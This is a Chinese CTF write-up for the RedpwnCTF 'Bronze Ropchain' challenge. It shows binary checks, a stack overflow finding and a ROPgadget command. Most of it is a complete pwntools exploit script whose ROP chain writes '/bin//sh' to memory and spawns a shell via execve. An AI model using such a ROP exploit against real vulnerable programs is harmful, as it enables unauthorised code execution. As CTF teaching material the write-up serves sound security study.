By

Contents
  1. 1. 因为它有点不一样
  • 写于19.8.18

这个题应该简单记录一下,我也不怎么用ropchain,感谢今天梦师傅的指点嘻嘻orz\

因为它有点不一样

checksec

1
2
3
4
5
6
7
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ checksec ./bronze_ropchain 
[*] '/home/kk/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain/bronze_ropchain'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

file/ldd

1
2
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ file ./bronze_ropchain 
./bronze_ropchain: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=16a9964f0e243870ebccdaf50522bcee80741083, not stripped
1
2
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ldd ./bronze_ropchain 
	not a dynamic executable

这两个指令都可以看出是静态编译
ida
漏洞很好找啦,栈溢出

OS: 本来我看见canary开启了,我就想先leak canary,结果…不需要,因为静态编译,观察ida没有readsword(梦师傅教我的哈哈哈哈),所以并不存在canary
运行一下看看

1
2
3
4
5
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ./bronze_ropchain 
What is your name?
kkkkk
Hello kkkkk
! How are you on this fine day?

输入不到0x400,可以发现函数支持\x0a截断
所以我们用ROPgadget找ropchain

1
ROPgadget --binary ./bronze_ropchain --badbytes '00|0a' --ropchain

参数badtypes指不含\x00 \x0a的ropchain

exp👇

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!usr/bin/python
from pwn import *
from struct import pack
# io = remote('chall2.2019.redpwn.net', 4004)
io = process('./bronze_ropchain')

io.recv()
p = ''
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80
payload = "a" * 0x18 + "a" * 4 + p

io.sendline(payload)
io.sendline('')

io.interactive()